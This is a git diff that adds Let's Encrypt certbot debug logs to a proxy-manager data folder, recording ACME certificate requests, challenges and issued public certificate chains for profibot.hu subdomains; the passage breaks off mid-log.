+YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty ++VUwFj9tmWxyR/M= +-----END CERTIFICATE----- + +2026-01-31 10:05:32,378:DEBUG:acme.client:Storing nonce: yEIP-nqM01FjQUoc2_FXJt02E3i6ZSDaGSgESgkfdjTL79QkK1A +2026-01-31 10:05:32,379:DEBUG:acme.client:JWS payload: +b'' +2026-01-31 10:05:32,382:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06315b868bc313fff79c1678826fc5353bb5/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ5RUlQLW5xTTAxRmpRVW9jMl9GWEp0MDJFM2k2WlNEYUdTZ0VTZ2tmZGpUTDc5UWtLMUEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzMTViODY4YmMzMTNmZmY3OWMxNjc4ODI2ZmM1MzUzYmI1LzEifQ", + "signature": "Ur0r2vF8Dp1hsBLGNEjk1qItBGjAPFPSNn0UdkP98elWHis0DSw7yAziVTLAmdOiJ_eo7Js1NeX9QMCkXhrYG0z_tG-7sgupR1AVlCPLXTE7MFwdMV1vfFmYC6meMETWV2COEgPcsn4pSLI4uIT2W-82c-LXfO2B02qeGjw2wd7Lp89gcIDJHMzHtkn0TY7InTL1guW9licPrslNZ2kcm7mF9vMjcc3FBJMimDSIHcJIs54jX-_9EcX3EfMDfCK5TC0Wsfbd_dCG1g0FxgE9fMH39SsGx8cxwxSmU-h_rsTXkXnVYAF0vGk1Ihph1870mJqIhac9gh4ZO6U2O4NXGA", + "payload": "" +} +2026-01-31 10:05:32,530:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06315b868bc313fff79c1678826fc5353bb5/1 HTTP/1.1" 200 2344 +2026-01-31 10:05:32,531:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:32 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2344 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: yEIP-nqMezTu3CQQQACiejc8dr-FueBDhXJFIumeAB1wvsNjmTE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDsTCCAzegAwIBAgISBjFbhovDE//3nBZ4gm/FNTu1MAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNjAxMzEwOTA2NTdaFw0yNjA1MDEwOTA2NTZaMBoxGDAWBgNVBAMTD25l +dC5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABKwtW342aV2/8aru +m0hPi+jFJ0AM5wDMj3xp+vyetd1pGy0jT7ieuKpUIneXwZkNXdM1eJzIpSfoyA71 +y0DO8w9sl7p6vblt1+xfW5/gTsVg9fwH0xL943U2YX8EQs5Se6OCAiYwggIiMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUOlAzyMRGz5HGJrDsyJNQN8xYXPQwHwYDVR0j +BBgwFoAUrkie3IcdRKBv2qLlYHQEeMKcAIAwMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTcuaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD25ldC5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTcuYy5sZW5jci5vcmcvNTQuY3JsMIIBDQYKKwYBBAHWeQIEAgSB +/gSB+wD5AHcAZBHEbKQS7KeJHKICLgC8q08oB9QeNSer6v7VA8l9zfAAAAGcE4PA +iQAABAMASDBGAiEAv+4DwsX4jIx6nG9ZV5CR5CJ+FB9I5TKHKCYLKMWnmuICIQDR +sr3yyIt2qCshqvJoOjBfNDgBNMMtB+rEVh9Lrz32cwB+AOMjjfKNoojgquCs8PqQ +yYXwtr/10qUnsAH8HERYxLboAAABnBODzBsACAAABQAxDn+2BAMARzBFAiAFE1ng +Njlf4v9w4myFSMbNP/0q/tDHCMa/ZN6KDW4eOwIhAK7O1PsZHPDGyD+RVCe2/29M +yOZP77xQX/Rd2BUwEFrPMAoGCCqGSM49BAMDA2gAMGUCMQDhQzE/vL0ff3F4jd2T +M43TFzRvMfgR4ktiP2qZLocN/l5Ea0IgIlWmRecgn9llnVkCMH1VRUmNekGdpXAM +aFgs8T3Wl3B1AydeIxReo2TYbyDM7QdiRjlc9RmjL+IfPw6S9A== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL +MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo +IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN +MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j +cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/ +vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF +HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw +DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS +BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA +gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm +MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww +CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu +b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX +lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb +Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf +-----END CERTIFICATE----- + +2026-01-31 10:05:32,531:DEBUG:acme.client:Storing nonce: yEIP-nqMezTu3CQQQACiejc8dr-FueBDhXJFIumeAB1wvsNjmTE +2026-01-31 10:05:32,540:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2026-01-31 10:05:32,541:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-19. +2026-01-31 10:05:32,541:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-19. +2026-01-31 10:05:32,542:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-19/cert.pem. +2026-01-31 10:05:32,543:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-19/privkey.pem. +2026-01-31 10:05:32,543:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-19/chain.pem. +2026-01-31 10:05:32,544:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-19/fullchain.pem. +2026-01-31 10:05:32,544:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-19/README. +2026-01-31 10:05:32,573:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2026-01-31 10:05:32,574:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2026-01-31 10:05:32,574:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2026-01-31 10:05:32,574:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2026-01-31 10:05:32,574:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2026-01-31 10:05:32,574:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2026-01-31 10:05:32,574:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2026-01-31 10:05:32,575:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2026-01-31 10:05:32,575:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-31 10:05:32,575:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-31 10:05:32,575:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2026-01-31 10:05:32,575:DEBUG:certbot.configuration:Var webroot_map={'net.profibot.hu': '/data/letsencrypt-acme-challenge'} (set by user). +2026-01-31 10:05:32,577:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-19/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-19/privkey.pem +This certificate expires on 2026-05-01. +These files will be updated when the certificate renews. +2026-01-31 10:05:32,578:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2026-01-31 10:05:32,578:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2026-01-31 10:05:32,579:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.1 b/proxy-manager/data/logs/letsencrypt.log.1 new file mode 100755 index 0000000..f299258 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.1 @@ -0,0 +1,1191 @@ +2026-01-27 23:21:29,496:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2026-01-27 23:21:29,496:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2026-01-27 23:21:29,496:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-18', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'terminal.profibot.hu'] +2026-01-27 23:21:29,496:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2026-01-27 23:21:29,506:DEBUG:certbot._internal.log:Root logging level set at 30 +2026-01-27 23:21:29,507:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-27 23:21:29,507:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2026-01-27 23:21:29,507:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2026-01-27 23:21:29,507:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2026-01-27 23:21:29,545:DEBUG:certbot._internal.main:Picked account: +2026-01-27 23:21:29,545:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2026-01-27 23:21:29,547:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2026-01-27 23:21:30,017:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2026-01-27 23:21:30,018:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:29 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "131oZhY9-pQ": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2026-01-27 23:21:30,019:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for terminal.profibot.hu +2026-01-27 23:21:30,025:DEBUG:acme.client:Requesting fresh nonce +2026-01-27 23:21:30,025:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2026-01-27 23:21:30,179:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2026-01-27 23:21:30,180:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:30 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 3aiLGgPYO5BoR4TgHvxXnBATSB4q2rwmts32t1UYCyiF_pvilxw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2026-01-27 23:21:30,181:DEBUG:acme.client:Storing nonce: 3aiLGgPYO5BoR4TgHvxXnBATSB4q2rwmts32t1UYCyiF_pvilxw +2026-01-27 23:21:30,181:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "terminal.profibot.hu"\n }\n ]\n}' +2026-01-27 23:21:30,185:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICIzYWlMR2dQWU81Qm9SNFRnSHZ4WG5CQVRTQjRxMnJ3bXRzMzJ0MVVZQ3lpRl9wdmlseHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "QbAjit56wL0H2WHHg23CwXYDluX742bOmCzYwu6C2z0r9B6QWfE_dCFALWJt_RAu_iFFxX1dFAliZ9IAXVf5Qoe7KSwlxX4yyn0El_K3Vx510KUQkgfxd-3UiESUp40W93Tj5afxUnQU028NZzacFzy_X76oLhON5urQaq0oL4z5jNOmdWFhNXG5d31vhEsxJHsW4wpCzphV1CKgsUJtYqq3PxoSKSnFsKPVvYDIXV_oVjO7dDy35plK27aICvgarNTDG8yotNHCyW4ERZUlNhYCEYQdtBZIs11Ipl99nc6asCMKnuvcWJ5SnoT9fdhqhHdgUWLK86G_nbK4GRbosA", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInRlcm1pbmFsLnByb2ZpYm90Lmh1IgogICAgfQogIF0KfQ" +} +2026-01-27 23:21:30,380:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 354 +2026-01-27 23:21:30,381:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:30 GMT +Content-Type: application/json +Content-Length: 354 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/474148880876 +Replay-Nonce: 3aiLGgPYq_4kBGLQKFrsQ6n2wz9g6DDqVOEi0a3jkBZq4eadhtI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "identifiers": [ + { + "type": "dns", + "value": "terminal.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/474148880876" +} +2026-01-27 23:21:30,381:DEBUG:acme.client:Storing nonce: 3aiLGgPYq_4kBGLQKFrsQ6n2wz9g6DDqVOEi0a3jkBZq4eadhtI +2026-01-27 23:21:30,382:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:30,385:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICIzYWlMR2dQWXFfNGtCR0xRS0Zyc1E2bjJ3ejlnNkREcVZPRWkwYTNqa0JacTRlYWRodEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "buqqRxzXl5NkCVUTV72nUD1nDaM7eauJ7Vhwv1BytZHBQ8tGGkGB9rUe8NppcFOB7NU6rmysQhbOH7CIFbDn5mofzvA9U1S6eCZ8vcZ5LECft2YNjiMnxJwHS4rRC_Owa6n2b2vBGT0xWGNEb-4PYi-Mno1i3FRfLrjiWbhrdjljdk0DSM-dShvljOqvfr45D9PQL5tSxPKfkm1HKPkVKjanx1G_LLVsAftPlxLWeO2ReW2AQ6m9CjijDe-uxmtSzU6AXpAFRkhYowobM0yC7fWEZiiLXOunjHE7UmpLd223smhQvzGROc11iTiYYK6kjJKPhkxYa7S_jLQ9mzQ9tw", + "payload": "" +} +2026-01-27 23:21:30,543:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:30,544:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:30 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblYLjvmy1AUbA3dSkFofJ4s6n_e1nIy6TTPuvzpFKUpOk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:30,544:DEBUG:acme.client:Storing nonce: _aMw-OblYLjvmy1AUbA3dSkFofJ4s6n_e1nIy6TTPuvzpFKUpOk +2026-01-27 23:21:30,545:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:30,545:INFO:certbot._internal.auth_handler:Performing the following challenges: +2026-01-27 23:21:30,546:INFO:certbot._internal.auth_handler:http-01 challenge for terminal.profibot.hu +2026-01-27 23:21:30,546:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2026-01-27 23:21:30,546:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2026-01-27 23:21:30,548:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0 +2026-01-27 23:21:30,549:DEBUG:acme.client:JWS payload: +b'{}' +2026-01-27 23:21:30,552:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibFlManZteTFBVWJBM2RTa0ZvZko0czZuX2Uxbkl5NlRUUHV2enBGS1VwT2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2L3pWbG9TQSJ9", + "signature": "HJz-rVSM940ALN668WpB-3zl1BJL8GRZRMDkCCYFZEBt6od59oPpuPeIYMnX-vgAD10syXaP6rJcKauQJ6R5ReHJhdIVYlDdN6kYvp6ArRV7wbmzwrmr9fz36LuVy9rv9wtbJdc7K_43gzu6AhXA6FQt5Nz4YgP1QAdmn6cy8ncvlsax37CAOcrJ0JUqXuUIxGYqUbbUtqMDKvhIidBIPk77fm_rS9Mld_iswjai-aG7dHporTJqjwHnsHgcIf-ldHO1jK-MMfYJkGVlyb6wIzMn_yGYMXalg2Sxt8Tuf_E96DmRgsPKfG4-vlqefZ5U7b0q9wIFi6esOhRpQSPf8w", + "payload": "e30" +} +2026-01-27 23:21:30,713:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/649789209516/zVloSA HTTP/1.1" 200 195 +2026-01-27 23:21:30,714:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:30 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA +Replay-Nonce: 3aiLGgPYCP6u6gBiSW8RA1Q44bJnJC_pNecN3tmBJJvyInxyXCo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" +} +2026-01-27 23:21:30,714:DEBUG:acme.client:Storing nonce: 3aiLGgPYCP6u6gBiSW8RA1Q44bJnJC_pNecN3tmBJJvyInxyXCo +2026-01-27 23:21:30,715:INFO:certbot._internal.auth_handler:Waiting for verification... +2026-01-27 23:21:31,715:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:31,719:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICIzYWlMR2dQWUNQNnU2Z0JpU1c4UkExUTQ0YkpuSkNfcE5lY04zdG1CSkp2eUlueHlYQ28iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "Y_cGEQ8EcO3_3d_j25yt0GuBa5f7ppr5h3CIzszYhYvdRpCdejXEAq5pfJJRNKsdi6sANqbU9-4XmaiThJM0XpA3AmBuOQ9JSwX4MPCF_bHyjwgUxbWOGfKfFu0dlL1uwP481Et2AApd77PcyfVbK8hHwBuzHKwFikG8x22TfoUUvf26wrBiqVdsLAqFGrvfPaYUe1mdWa7YgqthZbEsV1d1in2FZ9XqCKL8BD2M8VOaKIuPIz0UzsTgdUTA23kK5Q043Vzhbcx_fUoQAA7X3Sb6AhR8dvaa4C9lDNHLdn2yCLa-5VmziV9kWvHlAfSZ0AL8DbmUO_ecyNkrb56cjg", + "payload": "" +} +2026-01-27 23:21:31,875:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:21:31,876:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:21:31 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 3aiLGgPYEs63vQ617WQDrbOtxZDXUOAFadza5uUea3E8_g5fJSM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:21:31,876:DEBUG:acme.client:Storing nonce: 3aiLGgPYEs63vQ617WQDrbOtxZDXUOAFadza5uUea3E8_g5fJSM +2026-01-27 23:21:31,877:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:21:34,877:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:21:34,881:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICIzYWlMR2dQWUVzNjN2UTYxN1dRRHJiT3R4WkRYVU9BRmFkemE1dVVlYTNFOF9nNWZKU00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "dB80WIMmD98lB_3MQJNQnG3OWvPNMyxK1IbI9t7ZU6Fx7DqVjeoHXsU5OVZsJCJsBIqSzNVciD2KowHRuPR1CZtmyUtb1IeyDaYAvtVBoq_gWkFkeCZ9tYs2hosh0ALbM1TlEYpxcI9QAt6BnfXqxfQK1chdVgeTeaEk03jCANrBctse37kxYnKzs-02MB4gZ_wfgMvOlY8_vhnOCpQNo8nI3DGSuKzRO6KnBhZRGw-gUCaQuuXFm4Gf58S-81I5b0kEvZm3uDvU1QTblduUgcqJvqzh4UMq2FspxvEHg_EDqqtW93zjpPKUvf46XHXd8m6cis6RK612cMbAQ33drg", + "payload": "" +} +2026-01-27 